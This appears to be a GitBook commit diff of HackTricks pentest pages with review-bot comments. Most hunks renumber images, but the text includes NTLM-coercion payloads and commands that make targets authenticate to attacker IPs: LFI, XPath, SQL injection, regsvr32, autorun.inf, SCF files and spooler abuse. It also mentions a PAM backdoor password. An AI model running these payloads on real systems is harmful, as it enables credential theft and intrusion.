GitBook: [#3314] No subject
BIN
.gitbook/assets/image (307) (5).png
Normal file
After Width: | Height: | Size: 509 KiB |
Before Width: | Height: | Size: 509 KiB After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (618) (3).png
Normal file
After Width: | Height: | Size: 27 KiB |
Before Width: | Height: | Size: 27 KiB After Width: | Height: | Size: 102 KiB |
BIN
.gitbook/assets/image (637) (1) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 68 KiB |
Before Width: | Height: | Size: 68 KiB After Width: | Height: | Size: 102 KiB |
Before Width: | Height: | Size: 102 KiB After Width: | Height: | Size: 73 KiB |
Before Width: | Height: | Size: 73 KiB After Width: | Height: | Size: 261 KiB |
Before Width: | Height: | Size: 261 KiB After Width: | Height: | Size: 13 KiB |
BIN
.gitbook/assets/image (638) (2) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 17 KiB |
Before Width: | Height: | Size: 17 KiB After Width: | Height: | Size: 88 KiB |
Before Width: | Height: | Size: 88 KiB After Width: | Height: | Size: 3.6 KiB |
Before Width: | Height: | Size: 3.6 KiB After Width: | Height: | Size: 28 KiB |
Before Width: | Height: | Size: 28 KiB After Width: | Height: | Size: 99 KiB |
Before Width: | Height: | Size: 8.4 KiB After Width: | Height: | Size: 9.8 KiB |
Before Width: | Height: | Size: 9.8 KiB After Width: | Height: | Size: 120 KiB |
BIN
.gitbook/assets/image (660) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 170 KiB |
Before Width: | Height: | Size: 170 KiB After Width: | Height: | Size: 686 KiB |
Before Width: | Height: | Size: 686 KiB After Width: | Height: | Size: 55 KiB |
Before Width: | Height: | Size: 55 KiB After Width: | Height: | Size: 18 KiB |
BIN
.gitbook/assets/image (663) (1).png
Normal file
After Width: | Height: | Size: 256 KiB |
Before Width: | Height: | Size: 256 KiB After Width: | Height: | Size: 151 KiB |
|
@ -118,7 +118,7 @@ If you want more details about the networking topics introduced here, go to the
|
||||||
|
|
||||||
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
|
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (637).png>)
|
![](<../../.gitbook/assets/image (637) (1).png>)
|
||||||
|
|
||||||
This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).
|
This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).
|
||||||
|
|
||||||
|
|
|
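Review bot: check after merge that this page still renders the cbr0 bridge diagram, because the bytes behind the referenced name change here, not just the name. The binary file list at the top of this commit shows the `(637)` series being shifted by one suffix each (`image (637) (1) (1) (1) (1).png` is the new 68 KiB file, then 68 to 102 KiB, 102 to 73, 73 to 261, 261 to 13), and the 'Places to steal NTLM creds' page further down now points its run-dialog screenshot at the bare `image (637).png`. A suffix-shift like this silently re-points three unrelated pages at different images if any step of the chain is off; the same visual check applies to the other suffix-shift hunks in this commit (the `(638)`, `(660)`, `(307)`, `(618)` and `(663)` series).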
@ -141,7 +141,7 @@ A rule/signature consists of the following:
|
||||||
* The **header**, defining the protocol, IP addresses, ports and direction of the rule.
|
* The **header**, defining the protocol, IP addresses, ports and direction of the rule.
|
||||||
* The **rule options**, defining the specifics of the rule.
|
* The **rule options**, defining the specifics of the rule.
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (642).png>)
|
![](<../../../.gitbook/assets/image (642) (3).png>)
|
||||||
|
|
||||||
#### **Valid actions are**
|
#### **Valid actions are**
|
||||||
|
|
||||||
|
|
|
@ -96,7 +96,7 @@ vi modules/pam_unix/pam_unix_auth.c
|
||||||
|
|
||||||
Let’s change this by:
|
Let’s change this by:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (638).png>)
|
![](<../../.gitbook/assets/image (638) (2).png>)
|
||||||
|
|
||||||
This will allow any user using the **password "0xMitsurugi"** to log in.
|
This will allow any user using the **password "0xMitsurugi"** to log in.
|
||||||
|
|
||||||
|
|
|
@ -34,7 +34,7 @@ Electron has 2 process types:
|
||||||
* Main Process (has complete access to NodeJS)
|
* Main Process (has complete access to NodeJS)
|
||||||
* Renderer Process (should have NodeJS restricted access for security reasons)
|
* Renderer Process (should have NodeJS restricted access for security reasons)
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (307).png>)
|
![](<../../../.gitbook/assets/image (307) (5).png>)
|
||||||
|
|
||||||
A **renderer process** will be a browser window loading a file:
|
A **renderer process** will be a browser window loading a file:
|
||||||
|
|
||||||
|
@ -199,7 +199,7 @@ The desktop application **overrides these listeners** to implement the desktop a
|
||||||
|
|
||||||
**Here is a simplified pseudocode:**
|
**Here is a simplified pseudocode:**
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (638) (2) (1).png>)
|
![](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (620).png>)
|
![](<../../../.gitbook/assets/image (620).png>)
|
||||||
|
|
||||||
|
|
|
@ -351,7 +351,7 @@ When the browser finds that the **domain isn't responding** to him, it will **us
|
||||||
Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\
|
Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\
|
||||||
Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
|
Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
|
||||||
|
|
||||||
<img src="../.gitbook/assets/image (638) (2) (1) (1).png" alt="" data-size="original">
|
<img src="../.gitbook/assets/image (638) (2) (1) (1) (1).png" alt="" data-size="original">
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (620) (4).png>)
|
![](<../.gitbook/assets/image (620) (4).png>)
|
||||||
|
|
|
@ -100,7 +100,7 @@ In case `trustURLCodebase` is `true`, an attacker can provide his own classes in
|
||||||
|
|
||||||
It's easier to attack this LDAP using **JavaFactory references**:
|
It's easier to attack this LDAP using **JavaFactory references**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (660) (1).png>)
|
![](<../../.gitbook/assets/image (660) (1) (1).png>)
|
||||||
|
|
||||||
## Log4Shell Vulnerability
|
## Log4Shell Vulnerability
|
||||||
|
|
||||||
|
|
|
@ -158,7 +158,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
|
||||||
|
|
||||||
The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
|
The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (637) (1) (1).png>)
|
![](<../../.gitbook/assets/image (637) (1) (1) (1).png>)
|
||||||
|
|
||||||
The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
|
The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
|
||||||
|
|
||||||
|
|
|
@ -56,7 +56,7 @@ With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with t
|
||||||
* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
|
* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
|
||||||
* In frames of information you usually should **find different frames well aligned between them**:
|
* In frames of information you usually should **find different frames well aligned between them**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (660).png>)
|
![](<../../.gitbook/assets/image (660) (1).png>)
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (652) (1) (1).png>)
|
![](<../../.gitbook/assets/image (652) (1) (1).png>)
|
||||||
|
|
||||||
|
@ -101,7 +101,7 @@ You can **select the whole signal** where information is located, select **Ampli
|
||||||
|
|
||||||
For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
|
For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (637) (1).png>)
|
![](<../../.gitbook/assets/image (637) (1) (1).png>)
|
||||||
|
|
||||||
If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
|
If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Force NTLM Privileged Authentication
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -16,13 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Spooler Service Abuse
|
||||||
# Spooler Service Abuse
|
|
||||||
|
|
||||||
If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
|
If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
|
||||||
Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
|
Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
|
||||||
|
|
||||||
## Finding Windows Servers on the domain
|
### Finding Windows Servers on the domain
|
||||||
|
|
||||||
Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
|
Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
|
||||||
|
|
||||||
|
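Review bot: the second paragraph still reads 'Note when printer send the notification to an arbitrary systems, it needs to authenticate against that system'; suggest 'Note that when the spooler sends the notification to an arbitrary system, it needs to authenticate against that system'. Demoting `# Spooler Service Abuse` to `##` is correct, since the page already carries the `#` title `Force NTLM Privileged Authentication`, and the `###` sub-sections that follow now nest properly under it.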
@ -30,7 +29,7 @@ Using PowerShell, get a list of Windows boxes. Servers are usually priority, so
|
||||||
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
|
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## Finding Spooler services listening
|
### Finding Spooler services listening
|
||||||
|
|
||||||
Using a slightly modified @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), see if the Spooler Service is listening:
|
Using a slightly modified @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), see if the Spooler Service is listening:
|
||||||
|
|
||||||
|
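Review bot: in `Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") ...}` the second pattern has no wildcards, so `-notlike "2016"` only excludes an operatingSystem attribute that is exactly the string `2016`; Windows Server 2016 hosts stay in `servers.txt`. If the intent is to skip them, use `-notlike "*2016*"`. Also `-Properties *` pulls every attribute of every computer object only to `select Name`, which is needlessly slow in a large domain: `Name` is returned by default and `OperatingSystem` is evaluated server-side in the filter, so the switch can be dropped.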
@ -45,7 +44,7 @@ You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
|
||||||
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
|
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
|
||||||
```
|
```
|
||||||
|
|
||||||
## Ask the service to authenticate against an arbitrary host
|
### Ask the service to authenticate against an arbitrary host
|
||||||
|
|
||||||
You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
|
You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
|
||||||
|
|
||||||
|
@ -53,33 +52,36 @@ You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMt
|
||||||
SpoolSample.exe <TARGET> <RESPONDERIP>
|
SpoolSample.exe <TARGET> <RESPONDERIP>
|
||||||
```
|
```
|
||||||
|
|
||||||
or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
|
or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
|
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
|
||||||
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
|
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
|
||||||
```
|
```
|
||||||
|
|
||||||
## Combining with Unconstrained Delegation
|
### Combining with Unconstrained Delegation
|
||||||
|
|
||||||
If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
|
If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
|
||||||
|
|
||||||
# Inside Windows
|
## RCP Force authentication
|
||||||
|
|
||||||
|
{% embed url="https://github.com/p0dalirius/Coercer" %}
|
||||||
|
|
||||||
|
## Inside Windows
|
||||||
|
|
||||||
If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:
|
If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:
|
||||||
|
|
||||||
## Defender MpCmdRun
|
### Defender MpCmdRun
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
|
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
# Cracking NTLMv1
|
## Cracking NTLMv1
|
||||||
|
|
||||||
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlmv1-attack).\
|
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlmv1-attack).\
|
||||||
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
|
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
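Review bot: the new heading `## RCP Force authentication` should read `RPC`; the embedded Coercer repository coerces authentication through MS-RPC interfaces (MS-RPRN, MS-EFSR and others), and `RCP` will hurt searchability. In the Defender example, `C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe` hardcodes a single platform build whose directory name changes with every Defender platform update, so the line fails on any other host; either mark the version as an example or address the binary through the versioned directory with a wildcard (`C:\ProgramData\Microsoft\Windows Defender\Platform\*\MpCmdRun.exe`).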
@ -95,5 +97,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Places to steal NTLM creds
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -16,46 +16,45 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Automatic Payloads Creation & Other lists
|
||||||
|
|
||||||
# Automatic Payloads Creation & Other lists
|
### [ntlm\_theft](https://github.com/Greenwolf/ntlm\_theft)
|
||||||
|
|
||||||
## [ntlm\_theft](https://github.com/Greenwolf/ntlm_theft)
|
|
||||||
|
|
||||||
This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**.
|
This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**.
|
||||||
|
|
||||||
### ntlm\_theft supports the following attack types:
|
#### ntlm\_theft supports the following attack types:
|
||||||
|
|
||||||
Browse to Folder Containing:
|
Browse to Folder Containing:
|
||||||
|
|
||||||
* .url – via URL field
|
* .url – via URL field
|
||||||
* .url – via ICONFILE field
|
* .url – via ICONFILE field
|
||||||
* .lnk - via icon\_location field
|
* .lnk - via icon\_location field
|
||||||
* .scf – via ICONFILE field \(Not Working on Latest Windows\)
|
* .scf – via ICONFILE field (Not Working on Latest Windows)
|
||||||
* autorun.inf via OPEN field \(Not Working on Latest Windows\)
|
* autorun.inf via OPEN field (Not Working on Latest Windows)
|
||||||
* desktop.ini - via IconResource field \(Not Working on Latest Windows\)
|
* desktop.ini - via IconResource field (Not Working on Latest Windows)
|
||||||
|
|
||||||
Open Document:
|
Open Document:
|
||||||
|
|
||||||
* .xml – via Microsoft Word external stylesheet
|
* .xml – via Microsoft Word external stylesheet
|
||||||
* .xml – via Microsoft Word includepicture field
|
* .xml – via Microsoft Word includepicture field
|
||||||
* .htm – via Chrome & IE & Edge img src \(only if opened locally, not hosted\)
|
* .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
|
||||||
* .docx – via Microsoft Word includepicture field
|
* .docx – via Microsoft Word includepicture field
|
||||||
|
|
||||||
-.docx – via Microsoft Word external template
|
\-.docx – via Microsoft Word external template
|
||||||
|
|
||||||
-.docx – via Microsoft Word frameset webSettings
|
\-.docx – via Microsoft Word frameset webSettings
|
||||||
|
|
||||||
-.xlsx - via Microsoft Excel external cell
|
\-.xlsx - via Microsoft Excel external cell
|
||||||
|
|
||||||
-.wax - via Windows Media Player playlist \(Better, primary open\)
|
\-.wax - via Windows Media Player playlist (Better, primary open)
|
||||||
|
|
||||||
-.asx – via Windows Media Player playlist \(Better, primary open\)
|
\-.asx – via Windows Media Player playlist (Better, primary open)
|
||||||
|
|
||||||
-.m3u – via Windows Media Player playlist \(Worse, Win10 opens first in Groovy\)
|
\-.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
|
||||||
|
|
||||||
-.jnlp – via Java external jar
|
\-.jnlp – via Java external jar
|
||||||
|
|
||||||
-.application – via any Browser \(Must be served via a browser downloaded or won’t run\)
|
\-.application – via any Browser (Must be served via a browser downloaded or won’t run)
|
||||||
|
|
||||||
Open Document and Accept Popup:
|
Open Document and Accept Popup:
|
||||||
|
|
||||||
|
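Review bot: the entries from `\-.docx – via Microsoft Word external template` down to `\-.application – via any Browser (...)` are escaped dashes that render as plain paragraphs, while the preceding entries of the same 'Open Document' list are `*` bullets; make them `* .docx – via Microsoft Word external template` and so on so the list renders as one list. Also 'Win10 opens first in Groovy' should be 'Groove' (Groove Music is the Windows 10 default player that picks up `.m3u`).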
@ -88,29 +87,31 @@ Click Link in Chat Program:
|
||||||
> Generation Complete.
|
> Generation Complete.
|
||||||
> ```
|
> ```
|
||||||
|
|
||||||
## [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All_NTLM_leak)
|
### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All\_NTLM\_leak)
|
||||||
|
|
||||||
> Cheatsheet
|
> Cheatsheet
|
||||||
|
|
||||||
This is a list of techniques to force NTLM authentications to steal credentials from the victim.
|
This is a list of techniques to force NTLM authentications to steal credentials from the victim.
|
||||||
|
|
||||||
## Force NTLM Privileged Authentication
|
### Force NTLM Privileged Authentication
|
||||||
|
|
||||||
You may be able to **force a windows machine to authenticate to an arbitrary machine** using a privileged account. Read the following page to learn more:
|
You may be able to **force a windows machine to authenticate to an arbitrary machine** using a privileged account. Read the following page to learn more:
|
||||||
|
|
||||||
{% page-ref page="../active-directory-methodology/printers-spooler-service-abuse.md" %}
|
{% content-ref url="../active-directory-methodology/printers-spooler-service-abuse.md" %}
|
||||||
|
[printers-spooler-service-abuse.md](../active-directory-methodology/printers-spooler-service-abuse.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
# LFI
|
## LFI
|
||||||
|
|
||||||
The include\(\) in PHP will resolve the network path for us.
|
The include() in PHP will resolve the network path for us.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/?page=//11.22.33.44/@OsandaMalith
|
http://host.tld/?page=//11.22.33.44/@OsandaMalith
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/lfi.png?w=640)
|
![](<../../.gitbook/assets/image (642).png>)
|
||||||
|
|
||||||
# XXE
|
## XXE
|
||||||
|
|
||||||
In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
|
In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
|
||||||
|
|
||||||
|
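Review bot: the LFI example `http://host.tld/?page=//11.22.33.44/@OsandaMalith` only leaks a NetNTLM response when PHP runs on Windows, because it is the Windows SMB client that resolves the UNC path inside `include()`; on a Linux host the include simply fails. A one-line caveat in the LFI section would save readers a wasted Responder run, and the same Windows-only dependency applies to the `load_file()` and `xp_dirtree` examples later in this file.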
@ -126,51 +127,49 @@ In here I’m using “php://filter/convert.base64-encode/resource=” that will
|
||||||
</root>
|
</root>
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/xxe.png?w=640)
|
![](<../../.gitbook/assets/image (618).png>)
|
||||||
|
|
||||||
# XPath Injection
|
## XPath Injection
|
||||||
|
|
||||||
Usually, doc\(\) is used in out-of-band XPath injections, thus can be applied in resolving a network path.
|
Usually, doc() is used in out-of-band XPath injections, thus can be applied in resolving a network path.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
|
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/xpath.png?w=640)
|
![](<../../.gitbook/assets/image (638).png>)
|
||||||
|
|
||||||
# MySQL Injection
|
## MySQL Injection
|
||||||
|
|
||||||
I have written a complete [post ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/)on MySQL out-of-band injections which can be applied over the internet. You can also use ‘INTO OUTFILE’ to resolve a network path.
|
I have written a complete [post ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/)on MySQL out-of-band injections which can be applied over the internet. You can also use ‘INTO OUTFILE’ to resolve a network path.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00
|
http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/02/overinternet.png?w=640)
|
![](<../../.gitbook/assets/image (663).png>)
|
||||||
|
|
||||||
# MSSQL
|
## MSSQL
|
||||||
|
|
||||||
Since stacked queries are supported we can call stored procedures.
|
Since stacked queries are supported we can call stored procedures.
|
||||||
|
|
||||||
```text
|
```
|
||||||
';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
|
';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
|
||||||
```
|
```
|
||||||
|
|
||||||
# Regsvr32
|
## Regsvr32
|
||||||
|
|
||||||
Accidently found this one while experimenting with .sct files.
|
Accidently found this one while experimenting with .sct files.
|
||||||
|
|
||||||
```text
|
```
|
||||||
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
|
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/regsvr32.png?w=640)
|
## Batch
|
||||||
|
|
||||||
# Batch
|
|
||||||
|
|
||||||
There are many possible ways you can explore
|
There are many possible ways you can explore
|
||||||
|
|
||||||
```text
|
```
|
||||||
echo 1 > //192.168.0.1/abc
|
echo 1 > //192.168.0.1/abc
|
||||||
pushd \\192.168.0.1\abc
|
pushd \\192.168.0.1\abc
|
||||||
cmd /k \\192.168.0.1\abc
|
cmd /k \\192.168.0.1\abc
|
||||||
|
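Review bot: `http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00` uses typographic quotes (’ ‘ ’), which MySQL does not treat as string delimiters, so the payload fails when pasted as-is; replace them with ASCII `'`. It is also worth stating that `load_file()` requires the FILE privilege and an unrestricted `secure_file_priv`, and resolves a UNC path only on a Windows-hosted MySQL, whereas the `xp_dirtree` line in the MSSQL section below needs no file privilege to reach out.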
@ -182,32 +181,30 @@ dir\\192.168.0.1\abc
|
||||||
find, findstr, [x]copy, move, replace, del, rename and many more!
|
find, findstr, [x]copy, move, replace, del, rename and many more!
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/batch.png?w=640)
|
## Auto-Complete
|
||||||
|
|
||||||
# Auto-Complete
|
|
||||||
|
|
||||||
You just need to type ‘\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
You just need to type ‘\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/explorer.png?w=640)
|
![](<../../.gitbook/assets/image (660).png>)
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/run.png?w=640)
|
![](<../../.gitbook/assets/image (637).png>)
|
||||||
|
|
||||||
# Autorun.inf
|
## Autorun.inf
|
||||||
|
|
||||||
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
|
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
|
||||||
|
|
||||||
```text
|
```
|
||||||
[autorun]
|
[autorun]
|
||||||
open=\\35.164.153.224\setup.exe
|
open=\\35.164.153.224\setup.exe
|
||||||
icon=something.ico
|
icon=something.ico
|
||||||
action=open Setup.exe
|
action=open Setup.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
# Shell Command Files
|
## Shell Command Files
|
||||||
|
|
||||||
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF \(Shell Command Files\) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
|
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
|
||||||
|
|
||||||
```text
|
```
|
||||||
[Shell]
|
[Shell]
|
||||||
Command=2
|
Command=2
|
||||||
IconFile=\\AttackerIP\ordinary.ico
|
IconFile=\\AttackerIP\ordinary.ico
|
||||||
|
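Review bot: in the Auto-Complete section 'You just need to type ‘\host\’' has lost a backslash to markdown escaping; a UNC path needs two leading backslashes, so the rendered text should read `\\host\`. The Shell Command Files section also presents the `IconFile=\\AttackerIP\ordinary.ico` trick without the '(Not Working on Latest Windows)' caveat that the ntlm_theft list at the top of this same file attaches to `.scf – via ICONFILE field`; the two sections should agree.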
@ -215,11 +212,11 @@ IconFile=\\AttackerIP\ordinary.ico
|
||||||
Command=ToggleDesktop
|
Command=ToggleDesktop
|
||||||
```
|
```
|
||||||
|
|
||||||
# Desktop.ini
|
## Desktop.ini
|
||||||
|
|
||||||
